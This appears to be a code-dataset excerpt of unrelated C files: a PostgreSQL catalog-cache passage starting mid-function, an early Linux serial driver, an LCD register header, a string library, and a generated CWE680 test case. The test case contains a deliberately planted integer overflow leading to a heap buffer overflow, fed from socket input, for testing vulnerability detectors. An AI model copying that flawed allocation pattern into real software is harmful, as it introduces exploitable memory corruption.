iter.cur); if (ct->dead || ct->negative) continue; /* ignore dead and negative entries */ if (ct->hash_value != hashValue) continue; /* quickly skip entry if wrong hash val */ if (!ItemPointerEquals(&(ct->tuple.t_self), &(ntp->t_self))) continue; /* not same tuple */ /* * Found a match, but can't use it if it belongs to another * list already */ if (ct->c_list) continue; found = true; break; /* A-OK */ } if (!found) { /* We didn't find a usable entry, so make a new one */ ct = CatalogCacheCreateEntry(cache, ntp, hashValue, hashIndex, false); } /* Careful here: add entry to ctlist, then bump its refcount */ /* This way leaves state correct if lappend runs out of memory */ ctlist = lappend(ctlist, ct); ct->refcount++; } systable_endscan(scandesc); heap_close(relation, AccessShareLock); /* * Now we can build the CatCList entry. First we need a dummy tuple * containing the key values... */ ntp = build_dummy_tuple(cache, nkeys, cur_skey); oldcxt = MemoryContextSwitchTo(CacheMemoryContext); nmembers = list_length(ctlist); cl = (CatCList *) palloc(sizeof(CatCList) + nmembers * sizeof(CatCTup *)); heap_copytuple_with_tuple(ntp, &cl->tuple); MemoryContextSwitchTo(oldcxt); heap_freetuple(ntp); /* * We are now past the last thing that could trigger an elog before we * have finished building the CatCList and remembering it in the * resource owner. So it's OK to fall out of the PG_TRY, and indeed * we'd better do so before we start marking the members as belonging * to the list. */ } PG_CATCH(); { foreach(ctlist_item, ctlist) { ct = (CatCTup *) lfirst(ctlist_item); Assert(ct->c_list == NULL); Assert(ct->refcount > 0); ct->refcount--; if ( #ifndef CATCACHE_FORCE_RELEASE ct->dead && #endif ct->refcount == 0 && (ct->c_list == NULL || ct->c_list->refcount == 0)) CatCacheRemoveCTup(cache, ct); } PG_RE_THROW(); } PG_END_TRY(); cl->cl_magic = CL_MAGIC; cl->my_cache = cache; cl->refcount = 0; /* for the moment */ cl->dead = false; cl->ordered = ordered; cl->nkeys = nkeys; cl->hash_value = lHashValue; cl->n_members = nmembers; i = 0; foreach(ctlist_item, ctlist) { cl->members[i++] = ct = (CatCTup *) lfirst(ctlist_item); Assert(ct->c_list == NULL); ct->c_list = cl; /* release the temporary refcount on the member */ Assert(ct->refcount > 0); ct->refcount--; /* mark list dead if any members already dead */ if (ct->dead) cl->dead = true; } Assert(i == nmembers); dlist_push_head(&cache->cc_lists, &cl->cache_elem); /* Finally, bump the list's refcount and return it */ cl->refcount++; ResourceOwnerRememberCatCacheListRef(CurrentResourceOwner, cl); CACHE3_elog(DEBUG2, "SearchCatCacheList(%s): made list of %d members", cache->cc_relname, nmembers); return cl; } /* * ReleaseCatCacheList * * Decrement the reference count of a catcache list. */ void ReleaseCatCacheList(CatCList *list) { /* Safety checks to ensure we were handed a cache entry */ Assert(list->cl_magic == CL_MAGIC); Assert(list->refcount > 0); list->refcount--; ResourceOwnerForgetCatCacheListRef(CurrentResourceOwner, list); if ( #ifndef CATCACHE_FORCE_RELEASE list->dead && #endif list->refcount == 0) CatCacheRemoveCList(list->my_cache, list); } /* * CatalogCacheCreateEntry * Create a new CatCTup entry, copying the given HeapTuple and other * supplied data into it. The new entry initially has refcount 0. */ static CatCTup * CatalogCacheCreateEntry(CatCache *cache, HeapTuple ntp, uint32 hashValue, Index hashIndex, bool negative) { CatCTup *ct; HeapTuple dtp; MemoryContext oldcxt; /* * If there are any out-of-line toasted fields in the tuple, expand them * in-line. This saves cycles during later use of the catcache entry, and * also protects us against the possibility of the toast tuples being * freed before we attempt to fetch them, in case of something using a * slightly stale catcache entry. */ if (HeapTupleHasExternal(ntp)) dtp = toast_flatten_tuple(ntp, cache->cc_tupdesc); else dtp = ntp; /* * Allocate CatCTup header in cache memory, and copy the tuple there too. */ oldcxt = MemoryContextSwitchTo(CacheMemoryContext); ct = (CatCTup *) palloc(sizeof(CatCTup)); heap_copytuple_with_tuple(dtp, &ct->tuple); MemoryContextSwitchTo(oldcxt); if (dtp != ntp) heap_freetuple(dtp); /* * Finish initializing the CatCTup header, and add it to the cache's * linked list and counts. */ ct->ct_magic = CT_MAGIC; ct->my_cache = cache; ct->c_list = NULL; ct->refcount = 0; /* for the moment */ ct->dead = false; ct->negative = negative; ct->hash_value = hashValue; dlist_push_head(&cache->cc_bucket[hashIndex], &ct->cache_elem); cache->cc_ntup++; CacheHdr->ch_ntup++; return ct; } /* * build_dummy_tuple * Generate a palloc'd HeapTuple that contains the specified key * columns, and NULLs for other columns. * * This is used to store the keys for negative cache entries and CatCList * entries, which don't have real tuples associated with them. */ static HeapTuple build_dummy_tuple(CatCache *cache, int nkeys, ScanKey skeys) { HeapTuple ntp; TupleDesc tupDesc = cache->cc_tupdesc; Datum *values; bool *nulls; Oid tupOid = InvalidOid; NameData tempNames[4]; int i; values = (Datum *) palloc(tupDesc->natts * sizeof(Datum)); nulls = (bool *) palloc(tupDesc->natts * sizeof(bool)); memset(values, 0, tupDesc->natts * sizeof(Datum)); memset(nulls, true, tupDesc->natts * sizeof(bool)); for (i = 0; i < nkeys; i++) { int attindex = cache->cc_key[i]; Datum keyval = skeys[i].sk_argument; if (attindex > 0) { /* * Here we must be careful in case the caller passed a C string * where a NAME is wanted: convert the given argument to a * correctly padded NAME. Otherwise the memcpy() done in * heap_form_tuple could fall off the end of memory. */ if (cache->cc_isname[i]) { Name newval = &tempNames[i]; namestrcpy(newval, DatumGetCString(keyval)); keyval = NameGetDatum(newval); } values[attindex - 1] = keyval; nulls[attindex - 1] = false; } else { Assert(attindex == ObjectIdAttributeNumber); tupOid = DatumGetObjectId(keyval); } } ntp = heap_form_tuple(tupDesc, values, nulls); if (tupOid != InvalidOid) HeapTupleSetOid(ntp, tupOid); pfree(values); pfree(nulls); return ntp; } /* * PrepareToInvalidateCacheTuple() * * This is part of a rather subtle chain of events, so pay attention: * * When a tuple is inserted or deleted, it cannot be flushed from the * catcaches immediately, for reasons explained at the top of cache/inval.c. * Instead we have to add entry(s) for the tuple to a list of pending tuple * invalidations that will be done at the end of the command or transaction. * * The lists of tuples that need to be flushed are kept by inval.c. This * routine is a helper routine for inval.c. Given a tuple belonging to * the specified relation, find all catcaches it could be in, compute the * correct hash value for each such catcache, and call the specified * function to record the cache id and hash value in inval.c's lists. * CatalogCacheIdInvalidate will be called later, if appropriate, * using the recorded information. * * For an insert or delete, tuple is the target tuple and newtuple is NULL. * For an update, we are called just once, with tuple being the old tuple * version and newtuple the new version. We should make two list entries * if the tuple's hash value changed, but only one if it didn't. * * Note that it is irrelevant whether the given tuple is actually loaded * into the catcache at the moment. Even if it's not there now, it might * be by the end of the command, or there might be a matching negative entry * to flush --- or other backends' caches might have such entries --- so * we have to make list entries to flush it later. * * Also note that it's not an error if there are no catcaches for the * specified relation. inval.c doesn't know exactly which rels have * catcaches --- it will call this routine for any tuple that's in a * system relation. */ void PrepareToInvalidateCacheTuple(Relation relation, HeapTuple tuple, HeapTuple newtuple, void (*function) (int, uint32, Oid)) { slist_iter iter; Oid reloid; CACHE1_elog(DEBUG2, "PrepareToInvalidateCacheTuple: called"); /* * sanity checks */ Assert(RelationIsValid(relation)); Assert(HeapTupleIsValid(tuple)); Assert(PointerIsValid(function)); Assert(CacheHdr != NULL); reloid = RelationGetRelid(relation); /* ---------------- * for each cache * if the cache contains tuples from the specified relation * compute the tuple's hash value(s) in this cache, * and call the passed function to register the information. * ---------------- */ slist_foreach(iter, &CacheHdr->ch_caches) { CatCache *ccp = slist_container(CatCache, cc_next, iter.cur); uint32 hashvalue; Oid dbid; if (ccp->cc_reloid != reloid) continue; /* Just in case cache hasn't finished initialization yet... */ if (ccp->cc_tupdesc == NULL) CatalogCacheInitializeCache(ccp); hashvalue = CatalogCacheComputeTupleHashValue(ccp, tuple); dbid = ccp->cc_relisshared ? (Oid) 0 : MyDatabaseId; (*function) (ccp->id, hashvalue, dbid); if (newtuple) { uint32 newhashvalue; newhashvalue = CatalogCacheComputeTupleHashValue(ccp, newtuple); if (newhashvalue != hashvalue) (*function) (ccp->id, newhashvalue, dbid); } } } /* * Subroutines for warning about reference leaks. These are exported so * that resowner.c can call them. */ void PrintCatCacheLeakWarning(HeapTuple tuple) { CatCTup *ct = (CatCTup *) (((char *) tuple) - offsetof(CatCTup, tuple)); /* Safety check to ensure we were handed a cache entry */ Assert(ct->ct_magic == CT_MAGIC); elog(WARNING, "cache reference leak: cache %s (%d), tuple %u/%u has count %d", ct->my_cache->cc_relname, ct->my_cache->id, ItemPointerGetBlockNumber(&(tuple->t_self)), ItemPointerGetOffsetNumber(&(tuple->t_self)), ct->refcount); } void PrintCatCacheListLeakWarning(CatCList *list) { elog(WARNING, "cache reference leak: cache %s (%d), list %p has count %d", list->my_cache->cc_relname, list->my_cache->id, list, list->refcount); }
{ "language": "C" }
/* * linux/kernel/serial.c * * (C) 1991 Linus Torvalds */ /* * serial.c * * This module implements the rs232 io functions * void rs_write(struct tty_struct * queue); * void rs_init(void); * and all interrupts pertaining to serial IO. */ #include <linux/tty.h> #include <linux/sched.h> #include <asm/system.h> #include <asm/io.h> #define WAKEUP_CHARS (TTY_BUF_SIZE/4) extern void rs1_interrupt(void); extern void rs2_interrupt(void); static void init(int port) { outb_p(0x80,port+3); /* set DLAB of line control reg */ outb_p(0x30,port); /* LS of divisor (48 -> 2400 bps */ outb_p(0x00,port+1); /* MS of divisor */ outb_p(0x03,port+3); /* reset DLAB */ outb_p(0x0b,port+4); /* set DTR,RTS, OUT_2 */ outb_p(0x0d,port+1); /* enable all intrs but writes */ (void)inb(port); /* read data port to reset things (?) */ } void rs_init(void) { set_intr_gate(0x24,rs1_interrupt); set_intr_gate(0x23,rs2_interrupt); init(tty_table[1].read_q.data); init(tty_table[2].read_q.data); outb(inb_p(0x21)&0xE7,0x21); } /* * This routine gets called when tty_write has put something into * the write_queue. It must check wheter the queue is empty, and * set the interrupt register accordingly * * void _rs_write(struct tty_struct * tty); */ void rs_write(struct tty_struct * tty) { cli(); if (!EMPTY(tty->write_q)) outb(inb_p(tty->write_q.data+1)|0x02,tty->write_q.data+1); sti(); }
{ "language": "C" }
/* TEMPLATE GENERATED TESTCASE FILE Filename: CWE680_Integer_Overflow_to_Buffer_Overflow__new_connect_socket_66b.cpp Label Definition File: CWE680_Integer_Overflow_to_Buffer_Overflow__new.label.xml Template File: sources-sink-66b.tmpl.cpp */ /* * @description * CWE: 680 Integer Overflow to Buffer Overflow * BadSource: connect_socket Read data using a connect socket (client side) * GoodSource: Small number greater than zero that will not cause an integer overflow in the sink * Sinks: * BadSink : Attempt to allocate array using length value from source * Flow Variant: 66 Data flow: data passed in an array from one function to another in different source files * * */ #include "std_testcase.h" #ifdef _WIN32 #include <winsock2.h> #include <windows.h> #include <direct.h> #pragma comment(lib, "ws2_32") /* include ws2_32.lib when linking */ #define CLOSE_SOCKET closesocket #else /* NOT _WIN32 */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #define INVALID_SOCKET -1 #define SOCKET_ERROR -1 #define CLOSE_SOCKET close #define SOCKET int #endif #define TCP_PORT 27015 #define IP_ADDRESS "127.0.0.1" #define CHAR_ARRAY_SIZE (3 * sizeof(data) + 2) namespace CWE680_Integer_Overflow_to_Buffer_Overflow__new_connect_socket_66 { #ifndef OMITBAD void badSink(int dataArray[]) { /* copy data out of dataArray */ int data = dataArray[2]; { size_t dataBytes,i; int *intPointer; /* POTENTIAL FLAW: dataBytes may overflow to a small value */ dataBytes = data * sizeof(int); /* sizeof array in bytes */ intPointer = (int*)new char[dataBytes]; for (i = 0; i < (size_t)data; i++) { intPointer[i] = 0; /* may write beyond limit of intPointer if integer overflow occured above */ } printIntLine(intPointer[0]); delete [] intPointer; } } #endif /* OMITBAD */ #ifndef OMITGOOD /* goodG2B uses the GoodSource with the BadSink */ void goodG2BSink(int dataArray[]) { int data = dataArray[2]; { size_t dataBytes,i; int *intPointer; /* POTENTIAL FLAW: dataBytes may overflow to a small value */ dataBytes = data * sizeof(int); /* sizeof array in bytes */ intPointer = (int*)new char[dataBytes]; for (i = 0; i < (size_t)data; i++) { intPointer[i] = 0; /* may write beyond limit of intPointer if integer overflow occured above */ } printIntLine(intPointer[0]); delete [] intPointer; } } #endif /* OMITGOOD */ } /* close namespace */
{ "language": "C" }
#ifndef __ASM_ARCH_REGS_LCD_H #define __ASM_ARCH_REGS_LCD_H #include <mach/bitfield.h> /* * LCD Controller Registers and Bits Definitions */ #define LCCR0 (0x000) /* LCD Controller Control Register 0 */ #define LCCR1 (0x004) /* LCD Controller Control Register 1 */ #define LCCR2 (0x008) /* LCD Controller Control Register 2 */ #define LCCR3 (0x00C) /* LCD Controller Control Register 3 */ #define LCCR4 (0x010) /* LCD Controller Control Register 4 */ #define LCCR5 (0x014) /* LCD Controller Control Register 5 */ #define LCSR (0x038) /* LCD Controller Status Register 0 */ #define LCSR1 (0x034) /* LCD Controller Status Register 1 */ #define LIIDR (0x03C) /* LCD Controller Interrupt ID Register */ #define TMEDRGBR (0x040) /* TMED RGB Seed Register */ #define TMEDCR (0x044) /* TMED Control Register */ #define FBR0 (0x020) /* DMA Channel 0 Frame Branch Register */ #define FBR1 (0x024) /* DMA Channel 1 Frame Branch Register */ #define FBR2 (0x028) /* DMA Channel 2 Frame Branch Register */ #define FBR3 (0x02C) /* DMA Channel 2 Frame Branch Register */ #define FBR4 (0x030) /* DMA Channel 2 Frame Branch Register */ #define FBR5 (0x110) /* DMA Channel 2 Frame Branch Register */ #define FBR6 (0x114) /* DMA Channel 2 Frame Branch Register */ #define OVL1C1 (0x050) /* Overlay 1 Control Register 1 */ #define OVL1C2 (0x060) /* Overlay 1 Control Register 2 */ #define OVL2C1 (0x070) /* Overlay 2 Control Register 1 */ #define OVL2C2 (0x080) /* Overlay 2 Control Register 2 */ #define CMDCR (0x100) /* Command Control Register */ #define PRSR (0x104) /* Panel Read Status Register */ #define LCCR3_BPP(x) ((((x) & 0x7) << 24) | (((x) & 0x8) ? (1 << 29) : 0)) #define LCCR3_PDFOR_0 (0 << 30) #define LCCR3_PDFOR_1 (1 << 30) #define LCCR3_PDFOR_2 (2 << 30) #define LCCR3_PDFOR_3 (3 << 30) #define LCCR4_PAL_FOR_0 (0 << 15) #define LCCR4_PAL_FOR_1 (1 << 15) #define LCCR4_PAL_FOR_2 (2 << 15) #define LCCR4_PAL_FOR_3 (3 << 15) #define LCCR4_PAL_FOR_MASK (3 << 15) #define FDADR0 (0x200) /* DMA Channel 0 Frame Descriptor Address Register */ #define FDADR1 (0x210) /* DMA Channel 1 Frame Descriptor Address Register */ #define FDADR2 (0x220) /* DMA Channel 2 Frame Descriptor Address Register */ #define FDADR3 (0x230) /* DMA Channel 3 Frame Descriptor Address Register */ #define FDADR4 (0x240) /* DMA Channel 4 Frame Descriptor Address Register */ #define FDADR5 (0x250) /* DMA Channel 5 Frame Descriptor Address Register */ #define FDADR6 (0x260) /* DMA Channel 6 Frame Descriptor Address Register */ #define LCCR0_ENB (1 << 0) /* LCD Controller enable */ #define LCCR0_CMS (1 << 1) /* Color/Monochrome Display Select */ #define LCCR0_Color (LCCR0_CMS*0) /* Color display */ #define LCCR0_Mono (LCCR0_CMS*1) /* Monochrome display */ #define LCCR0_SDS (1 << 2) /* Single/Dual Panel Display Select */ #define LCCR0_Sngl (LCCR0_SDS*0) /* Single panel display */ #define LCCR0_Dual (LCCR0_SDS*1) /* Dual panel display */ #define LCCR0_LDM (1 << 3) /* LCD Disable Done Mask */ #define LCCR0_SFM (1 << 4) /* Start of frame mask */ #define LCCR0_IUM (1 << 5) /* Input FIFO underrun mask */ #define LCCR0_EFM (1 << 6) /* End of Frame mask */ #define LCCR0_PAS (1 << 7) /* Passive/Active display Select */ #define LCCR0_Pas (LCCR0_PAS*0) /* Passive display (STN) */ #define LCCR0_Act (LCCR0_PAS*1) /* Active display (TFT) */ #define LCCR0_DPD (1 << 9) /* Double Pixel Data (monochrome) */ #define LCCR0_4PixMono (LCCR0_DPD*0) /* 4-Pixel/clock Monochrome display */ #define LCCR0_8PixMono (LCCR0_DPD*1) /* 8-Pixel/clock Monochrome display */ #define LCCR0_DIS (1 << 10) /* LCD Disable */ #define LCCR0_QDM (1 << 11) /* LCD Quick Disable mask */ #define LCCR0_PDD (0xff << 12) /* Palette DMA request delay */ #define LCCR0_PDD_S 12 #define LCCR0_BM (1 << 20) /* Branch mask */ #define LCCR0_OUM (1 << 21) /* Output FIFO underrun mask */ #define LCCR0_LCDT (1 << 22) /* LCD panel type */ #define LCCR0_RDSTM (1 << 23) /* Read status interrupt mask */ #define LCCR0_CMDIM (1 << 24) /* Command interrupt mask */ #define LCCR0_OUC (1 << 25) /* Overlay Underlay control bit */ #define LCCR0_LDDALT (1 << 26) /* LDD alternate mapping control */ #define LCCR1_PPL Fld (10, 0) /* Pixels Per Line - 1 */ #define LCCR1_DisWdth(Pixel) (((Pixel) - 1) << FShft (LCCR1_PPL)) #define LCCR1_HSW Fld (6, 10) /* Horizontal Synchronization */ #define LCCR1_HorSnchWdth(Tpix) (((Tpix) - 1) << FShft (LCCR1_HSW)) #define LCCR1_ELW Fld (8, 16) /* End-of-Line pixel clock Wait - 1 */ #define LCCR1_EndLnDel(Tpix) (((Tpix) - 1) << FShft (LCCR1_ELW)) #define LCCR1_BLW Fld (8, 24) /* Beginning-of-Line pixel clock */ #define LCCR1_BegLnDel(Tpix) (((Tpix) - 1) << FShft (LCCR1_BLW)) #define LCCR2_LPP Fld (10, 0) /* Line Per Panel - 1 */ #define LCCR2_DisHght(Line) (((Line) - 1) << FShft (LCCR2_LPP)) #define LCCR2_VSW Fld (6, 10) /* Vertical Synchronization pulse - 1 */ #define LCCR2_VrtSnchWdth(Tln) (((Tln) - 1) << FShft (LCCR2_VSW)) #define LCCR2_EFW Fld (8, 16) /* End-of-Frame line clock Wait */ #define LCCR2_EndFrmDel(Tln) ((Tln) << FShft (LCCR2_EFW)) #define LCCR2_BFW Fld (8, 24) /* Beginning-of-Frame line clock */ #define LCCR2_BegFrmDel(Tln) ((Tln) << FShft (LCCR2_BFW)) #define LCCR3_API (0xf << 16) /* AC Bias pin trasitions per interrupt */ #define LCCR3_API_S 16 #define LCCR3_VSP (1 << 20) /* vertical sync polarity */ #define LCCR3_HSP (1 << 21) /* horizontal sync polarity */ #define LCCR3_PCP (1 << 22) /* Pixel Clock Polarity (L_PCLK) */ #define LCCR3_PixRsEdg (LCCR3_PCP*0) /* Pixel clock Rising-Edge */ #define LCCR3_PixFlEdg (LCCR3_PCP*1) /* Pixel clock Falling-Edge */ #define LCCR3_OEP (1 << 23) /* Output Enable Polarity */ #define LCCR3_OutEnH (LCCR3_OEP*0) /* Output Enable active High */ #define LCCR3_OutEnL (LCCR3_OEP*1) /* Output Enable active Low */ #define LCCR3_DPC (1 << 27) /* double pixel clock mode */ #define LCCR3_PCD Fld (8, 0) /* Pixel Clock Divisor */ #define LCCR3_PixClkDiv(Div) (((Div) << FShft (LCCR3_PCD))) #define LCCR3_ACB Fld (8, 8) /* AC Bias */ #define LCCR3_Acb(Acb) (((Acb) << FShft (LCCR3_ACB))) #define LCCR3_HorSnchH (LCCR3_HSP*0) /* HSP Active High */ #define LCCR3_HorSnchL (LCCR3_HSP*1) /* HSP Active Low */ #define LCCR3_VrtSnchH (LCCR3_VSP*0) /* VSP Active High */ #define LCCR3_VrtSnchL (LCCR3_VSP*1) /* VSP Active Low */ #define LCCR5_IUM(x) (1 << ((x) + 23)) /* input underrun mask */ #define LCCR5_BSM(x) (1 << ((x) + 15)) /* branch mask */ #define LCCR5_EOFM(x) (1 << ((x) + 7)) /* end of frame mask */ #define LCCR5_SOFM(x) (1 << ((x) + 0)) /* start of frame mask */ #define LCSR_LDD (1 << 0) /* LCD Disable Done */ #define LCSR_SOF (1 << 1) /* Start of frame */ #define LCSR_BER (1 << 2) /* Bus error */ #define LCSR_ABC (1 << 3) /* AC Bias count */ #define LCSR_IUL (1 << 4) /* input FIFO underrun Lower panel */ #define LCSR_IUU (1 << 5) /* input FIFO underrun Upper panel */ #define LCSR_OU (1 << 6) /* output FIFO underrun */ #define LCSR_QD (1 << 7) /* quick disable */ #define LCSR_EOF (1 << 8) /* end of frame */ #define LCSR_BS (1 << 9) /* branch status */ #define LCSR_SINT (1 << 10) /* subsequent interrupt */ #define LCSR_RD_ST (1 << 11) /* read status */ #define LCSR_CMD_INT (1 << 12) /* command interrupt */ #define LCSR1_IU(x) (1 << ((x) + 23)) /* Input FIFO underrun */ #define LCSR1_BS(x) (1 << ((x) + 15)) /* Branch Status */ #define LCSR1_EOF(x) (1 << ((x) + 7)) /* End of Frame Status */ #define LCSR1_SOF(x) (1 << ((x) - 1)) /* Start of Frame Status */ #define LDCMD_PAL (1 << 26) /* instructs DMA to load palette buffer */ /* overlay control registers */ #define OVLxC1_PPL(x) ((((x) - 1) & 0x3ff) << 0) /* Pixels Per Line */ #define OVLxC1_LPO(x) ((((x) - 1) & 0x3ff) << 10) /* Number of Lines */ #define OVLxC1_BPP(x) (((x) & 0xf) << 20) /* Bits Per Pixel */ #define OVLxC1_OEN (1 << 31) /* Enable bit for Overlay */ #define OVLxC2_XPOS(x) (((x) & 0x3ff) << 0) /* Horizontal Position */ #define OVLxC2_YPOS(x) (((x) & 0x3ff) << 10) /* Vertical Position */ #define OVL2C2_PFOR(x) (((x) & 0x7) << 20) /* Pixel Format */ /* smartpanel related */ #define PRSR_DATA(x) ((x) & 0xff) /* Panel Data */ #define PRSR_A0 (1 << 8) /* Read Data Source */ #define PRSR_ST_OK (1 << 9) /* Status OK */ #define PRSR_CON_NT (1 << 10) /* Continue to Next Command */ #define SMART_CMD_A0 (0x1 << 8) #define SMART_CMD_READ_STATUS_REG (0x0 << 9) #define SMART_CMD_READ_FRAME_BUFFER ((0x0 << 9) | SMART_CMD_A0) #define SMART_CMD_WRITE_COMMAND (0x1 << 9) #define SMART_CMD_WRITE_DATA ((0x1 << 9) | SMART_CMD_A0) #define SMART_CMD_WRITE_FRAME ((0x2 << 9) | SMART_CMD_A0) #define SMART_CMD_WAIT_FOR_VSYNC (0x3 << 9) #define SMART_CMD_NOOP (0x4 << 9) #define SMART_CMD_INTERRUPT (0x5 << 9) #define SMART_CMD(x) (SMART_CMD_WRITE_COMMAND | ((x) & 0xff)) #define SMART_DAT(x) (SMART_CMD_WRITE_DATA | ((x) & 0xff)) /* SMART_DELAY() is introduced for software controlled delay primitive which * can be inserted between command sequences, unused command 0x6 is used here * and delay ranges from 0ms ~ 255ms */ #define SMART_CMD_DELAY (0x6 << 9) #define SMART_DELAY(ms) (SMART_CMD_DELAY | ((ms) & 0xff)) #endif /* __ASM_ARCH_REGS_LCD_H */
{ "language": "C" }
/* * linux/lib/string.c * * Copyright (C) 1991, 1992 Linus Torvalds */ /* * stupid library routines.. The optimized versions should generally be found * as inline code in <asm-xx/string.h> * * These are buggy as well.. * * * Fri Jun 25 1999, Ingo Oeser <ioe@informatik.tu-chemnitz.de> * - Added strsep() which will replace strtok() soon (because strsep() is * reentrant and should be faster). Use only strsep() in new code, please. */ #include "config.h" #include "libc/string.h" #include "libc/stdlib.h" /** * strnicmp - Case insensitive, length-limited string comparison * @s1: One string * @s2: The other string * @len: the maximum number of characters to compare */ int strnicmp(const char *s1, const char *s2, size_t len) { /* Yes, Virginia, it had better be unsigned */ unsigned char c1, c2; c1 = 0; c2 = 0; if (len) { do { c1 = *s1; c2 = *s2; s1++; s2++; if (!c1) break; if (!c2) break; if (c1 == c2) continue; c1 = tolower(c1); c2 = tolower(c2); if (c1 != c2) break; } while (--len); } return (int)c1 - (int)c2; } /** * strcpy - Copy a %NUL terminated string * @dest: Where to copy the string to * @src: Where to copy the string from */ char * strcpy(char * dest,const char *src) { char *tmp = dest; while ((*dest++ = *src++) != '\0') /* nothing */; return tmp; } /** * strncpy - Copy a length-limited, %NUL-terminated string * @dest: Where to copy the string to * @src: Where to copy the string from * @count: The maximum number of bytes to copy * * Note that unlike userspace strncpy, this does not %NUL-pad the buffer. * However, the result is not %NUL-terminated if the source exceeds * @count bytes. */ char * strncpy(char * dest,const char *src,size_t count) { char *tmp = dest; while (count-- && (*dest++ = *src++) != '\0') /* nothing */; return tmp; } /** * strcat - Append one %NUL-terminated string to another * @dest: The string to be appended to * @src: The string to append to it */ char * strcat(char * dest, const char * src) { char *tmp = dest; while (*dest) dest++; while ((*dest++ = *src++) != '\0') ; return tmp; } /** * strncat - Append a length-limited, %NUL-terminated string to another * @dest: The string to be appended to * @src: The string to append to it * @count: The maximum numbers of bytes to copy * * Note that in contrast to strncpy, strncat ensures the result is * terminated. */ char * strncat(char *dest, const char *src, size_t count) { char *tmp = dest; if (count) { while (*dest) dest++; while ((*dest++ = *src++)) { if (--count == 0) { *dest = '\0'; break; } } } return tmp; } /** * strcmp - Compare two strings * @cs: One string * @ct: Another string */ int strcmp(const char * cs,const char * ct) { register signed char __res; while (1) { if ((__res = *cs - *ct++) != 0 || !*cs++) break; } return __res; } /** * strncmp - Compare two length-limited strings * @cs: One string * @ct: Another string * @count: The maximum number of bytes to compare */ int strncmp(const char * cs,const char * ct,size_t count) { register signed char __res = 0; while (count) { if ((__res = *cs - *ct++) != 0 || !*cs++) break; count--; } return __res; } /** * strchr - Find the first occurrence of a character in a string * @s: The string to be searched * @c: The character to search for */ char * strchr(const char * s, int c) { for(; *s != (char) c; ++s) if (*s == '\0') return NULL; return (char *) s; } /** * strrchr - Find the last occurrence of a character in a string * @s: The string to be searched * @c: The character to search for */ char * strrchr(const char * s, int c) { const char *p = s + strlen(s); do { if (*p == (char)c) return (char *)p; } while (--p >= s); return NULL; } /** * strlen - Find the length of a string * @s: The string to be sized */ size_t strlen(const char * s) { const char *sc; for (sc = s; *sc != '\0'; ++sc) /* nothing */; return sc - s; } /** * strnlen - Find the length of a length-limited string * @s: The string to be sized * @count: The maximum number of bytes to search */ size_t strnlen(const char * s, size_t count) { const char *sc; for (sc = s; count-- && *sc != '\0'; ++sc) /* nothing */; return sc - s; } /** * strpbrk - Find the first occurrence of a set of characters * @cs: The string to be searched * @ct: The characters to search for */ char * strpbrk(const char * cs,const char * ct) { const char *sc1,*sc2; for( sc1 = cs; *sc1 != '\0'; ++sc1) { for( sc2 = ct; *sc2 != '\0'; ++sc2) { if (*sc1 == *sc2) return (char *) sc1; } } return NULL; } /** * strsep - Split a string into tokens * @s: The string to be searched * @ct: The characters to search for * * strsep() updates @s to point after the token, ready for the next call. * * It returns empty tokens, too, behaving exactly like the libc function * of that name. In fact, it was stolen from glibc2 and de-fancy-fied. * Same semantics, slimmer shape. ;) */ char * strsep(char **s, const char *ct) { char *sbegin = *s, *end; if (sbegin == NULL) return NULL; end = strpbrk(sbegin, ct); if (end) *end++ = '\0'; *s = end; return sbegin; } /** * memset - Fill a region of memory with the given value * @s: Pointer to the start of the area. * @c: The byte to fill the area with * @count: The size of the area. * * Do not use memset() to access IO space, use memset_io() instead. */ void * memset(void * s,int c,size_t count) { char *xs = (char *) s; while (count--) *xs++ = c; return s; } /** * memcpy - Copy one area of memory to another * @dest: Where to copy to * @src: Where to copy from * @count: The size of the area. * * You should not use this function to access IO space, use memcpy_toio() * or memcpy_fromio() instead. */ void * memcpy(void * dest,const void *src,size_t count) { char *tmp = (char *) dest, *s = (char *) src; while (count--) *tmp++ = *s++; return dest; } /** * memmove - Copy one area of memory to another * @dest: Where to copy to * @src: Where to copy from * @count: The size of the area. * * Unlike memcpy(), memmove() copes with overlapping areas. */ void * memmove(void * dest,const void *src,size_t count) { char *tmp, *s; if (dest <= src) { tmp = (char *) dest; s = (char *) src; while (count--) *tmp++ = *s++; } else { tmp = (char *) dest + count; s = (char *) src + count; while (count--) *--tmp = *--s; } return dest; } /** * memcmp - Compare two areas of memory * @cs: One area of memory * @ct: Another area of memory * @count: The size of the area. */ int memcmp(const void * cs,const void * ct,size_t count) { const unsigned char *su1, *su2; int res = 0; for( su1 = cs, su2 = ct; 0 < count; ++su1, ++su2, count--) if ((res = *su1 - *su2) != 0) break; return res; } char * strdup( const char *str ) { char *p; if( !str ) return NULL; p = malloc( strlen(str) + 1 ); strcpy( p, str ); return p; } int strcasecmp( const char *cs, const char *ct ) { register signed char __res; while (1) { char ch1 = toupper(*cs), ch2 = toupper(*ct); ct++; if ((__res = ch1 - ch2) != 0 || !*cs++) break; } return __res; } int strncasecmp( const char *cs, const char *ct, size_t count ) { register signed char __res = 0; while (count--) { char ch1 = toupper(*cs), ch2 = toupper(*ct); ct++; if ((__res = ch1 - ch2) != 0 || !*cs++) break; } return __res; }
{ "language": "C" }